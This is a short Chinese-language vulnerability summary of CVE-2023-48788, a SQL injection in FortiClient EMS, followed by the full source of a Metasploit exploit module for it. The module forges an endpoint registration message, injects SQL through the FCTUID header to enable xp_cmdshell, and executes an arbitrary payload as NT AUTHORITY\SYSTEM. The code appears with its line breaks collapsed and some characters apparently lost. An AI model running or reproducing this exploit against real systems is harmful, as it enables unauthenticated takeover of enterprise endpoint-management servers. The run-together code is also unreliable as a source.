FortiNet FortiClient EMS (Endpoint Management Server) 中存在一个 SQL 注入漏洞，该漏洞影响 7.2.0 到 7.2.2 和 7.0.1 到 7.0.10 版本。攻击者可以通过该漏洞在 NT AUTHORITY\SYSTEM 上下文中执行未经身份验证的远程代码。

😄 该漏洞允许攻击者在 FortiClient EMS 中执行 SQL 注入攻击，利用 FCTUID 参数进行注入。

😎 攻击者可以通过 SQL 注入启用 xp_cmdshell，该命令用于在数据库中执行操作系统命令。

😈 通过 xp_cmdshell，攻击者可以在 NT AUTHORITY\SYSTEM 上下文中执行未经身份验证的远程代码，获得对受感染系统的完全控制。

👿 漏洞影响 FortiClient EMS 7.2.0 到 7.2.2 和 7.0.1 到 7.0.10 版本，建议升级到 7.2.3、7.0.11 或更高版本。

😢 为了使系统易受攻击，必须至少有一个端点注册到 FortiClient EMS 上，才能使漏洞利用成功。

This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRankinginclude Msf::Exploit::Remote::HttpClientinclude Msf::Exploit::Remote::Tcpprepend Msf::Exploit::Remote::AutoCheckdef initialize(info = {})super(update_info(info,'Name' => 'FortiNet FortiClient Endpoint Management Server FCTID SQLi to RCE','Description' => %q{An SQLi injection vulnerability exists in FortiNet FortiClient EMS (Endpoint Management Server).FortiClient EMS serves as an endpoint management solution tailored for enterprises, offering a centralizedplatform for overseeing enrolled endpoints. The SQLi is vulnerability is due to user controller strings whichcan be sent directly into database queries.FcmDaemon.exe is the main service responsible for communicating with enrolled clients. By default it listens on port 8013and communicates with FCTDas.exe which is responsible for translating requests and sending them to the database.In the message header of a specific request sent between the two services, the FCTUID parameter is vulnerableSQLi. The SQLi can used to enable the xp_cmdshell which can then be used to obtain unauthenticated remote codeexecution in the context of NT AUTHORITY\SYSTEMAffected versions of FortiClient EMS include:7.2.0 through 7.2.27.0.1 through 7.0.10Upgrading to either 7.2.3, 7.0.11 or above is recommended by FortiNet.It should be noted that in order to be vulnerable, at least one endpoint needs to be enrolled / managed by FortiClientEMS for the necessary vulnerable services to be available.},'Author' => ['Zach Hanley', # Analysis & PoC'James Horseman', # Analysis & PoC'jheysel-r7', # Msf module'Spencer McIntyre' # Msf module assistance],'References' => [[ 'URL', 'https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-fortinet-forticlientems-sql-injection-deep-dive/'],[ 'URL', 'https://github.com/horizon3ai/CVE-2023-48788/blob/main/CVE-2023-48788.py'],[ 'CVE', '2023-48788']],'License' => MSF_LICENSE,'Platform' => 'win','Privileged' => true,'Arch' => [ ARCH_CMD ],'Targets' => [[ 'Automatic Target', {}]],'DefaultTarget' => 0,'DisclosureDate' => '2024-04-21','DefaultOptions' => {'SSL' => true,'RPORT' => 8013},'Notes' => {'Stability' => [ CRASH_SAFE ],'SideEffects' => [ IOC_IN_LOGS ],'Reliability' => [ REPEATABLE_SESSION ]}))enddef get_register_inforegister_info = <<~REGISTER_INFOAVSIG_VER=1.00000REG_KEY=_EP_ONNETCHKSUM=0AVENG_VER=6.00266DHCP_SERVER=NoneFCTOS=WIN64VULSIG_VER=1.00000FCTVER=7.0.7.0345APPSIG_VER=13.00364USER=AdministratorAPPENG_VER=4.00082AVALSIG_VER=0.00000VULENG_VER=2.00032OSVER=Microsoft Windows Server 2019 , 64-bit (build 17763)COM_MODEL=VMware Virtual PlatformRSENG_VER=1.00020AV_PROTECTED=0AVALENG_VER=0.00000PEER_IP=ENABLED_FEATURE_BITMAP=49EP_OFFNETCHKSUM=0INSTALLED_FEATURE_BITMAP=158583EP_CHKSUM=0HIDDEN_FEATURE_BITMAP=155943DISKENC=HOSTNAME=CYBER-RETQB1FLPAV_PRODUCT=FCT_SN=FCT8001638848651INSTALLUID=#{Faker::Internet.uuid.upcase}NWIFS=Ethernet0|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|1||0UTC=1710271774PC_DOMAIN=COM_MAN=VMware, Inc.CPU=Intel(R) Xeon(R) Silver 4215 CPU @ 2.50GHzMEM=12287HDD=99COM_SN=VMware-42 04 ed 2d 64 e8 0b 14-45 e9 e4 f6 5a c7 67 82DOMAIN=WORKGROUP=WORKGROUPUSER_SID=S-1-5-21-#{rand(9) 10}-#{rand(9) 10}-#{rand(9) 10}-500GROUP_TAG=ADGUID=EP_FGTCHKSUM=0EP_RULECHKSUM=0WF_FILESCHKSUM=0EP_APPCTRLCHKSUM=0REGISTER_INFORex::Text.encode_base64(register_info)enddef get_message(sqli)message = "MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD{SQLI_PLACEHOLDER}\n"message << "IP=127.0.0.1\n"message << "MAC=#{Faker::Internet.mac_address}\n"message << "FCT_ONNET=0\n"message << "CAPS=32767\n"message << "VDOM=default\n"message << "EC_QUARANTINED=0\n"message << "SIZE= {SIZE_PLACEHOLDER}\n"message << "\n"message << "X-FCCK-REGISTER: SYSINFO||#{get_register_info}\n"message << 'X-FCCK-REGISTER-END'message << "\r\n"message << "\r\n"message.gsub!('{SQLI_PLACEHOLDER}', sqli)message_length = message.lengthmessage_length = message_length - '{SIZE_PLACEHOLDER}'.length + message_length.to_s.lengthmessage.gsub!('{SIZE_PLACEHOLDER}', message_length.to_s)messageenddef send_message(sqli)message = get_message(sqli)vprint_status("Sending the following message: #{message}")buf = ''beginconnect(true, { 'SSL' => true })sock.put(message)buf = sock.get_once || ''rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => eelog("#{e.class} #{e.message}\n#{e.backtrace "\n"}")ensuredisconnectendvprint_status("The response received was: #{buf}")bufenddef checkres = send_message("' OR 1=1; --")return CheckCode::Vulnerable('The SQLi has been exploited successfully') if res.include?('KA_INTERVAL')return CheckCode::Safe if res.include?("The FCT record doesn't exist")CheckCode::Unknown("#{peer} - FmcDaemon.exe does not appear to be running on the endpoint targeted")enddef exploit# Things to note:# 1. xp_cmdshell is disabled by default so first we must enable it.# 2. The application takes the SQL statement we inject into and converts it all to upper case. This was causing# attempted Base64 encoded payloads to fail, and is why we send the payload has a hex string and decode it using SQL# before running the command with xp_command shell.# 3. We expect to see KA_INTERVAL in the response to every SQLi attempt except for when we deliver the payload which# is when we expect the response to be empty.inject = ["' OR 1=1; exec master.dbo.sp_configure 'show advanced options', 1;--","' OR 1=1; reconfigure;--","' OR 1=1; exec master.dbo.sp_configure 'xp_cmdshell',1;--","' OR 1=1; reconfigure;--","' OR 1=1; DECLARE @SQL VARCHAR(#{payload.encoded.length}) = CONVERT(VARCHAR(MAX), 0X#{payload.encoded.unpack('H').first}); exec master.dbo.xp_cmdshell @sql;--",]inject.each do |sqli|if sqli == inject.lastsend_message(sqli).empty? ? print_good("The SQLi: #{sqli} was executed successfully") : fail_with(Failure::UnexpectedReply, 'The SQLi injection response indicated the injection was unsuccessful.')elsesend_message(sqli).include?('KA_INTERVAL') ? print_good("The SQLi: #{sqli} was executed successfully") : fail_with(Failure::UnexpectedReply, 'The SQLi injection response indicated the injection was unsuccessful.')endendendend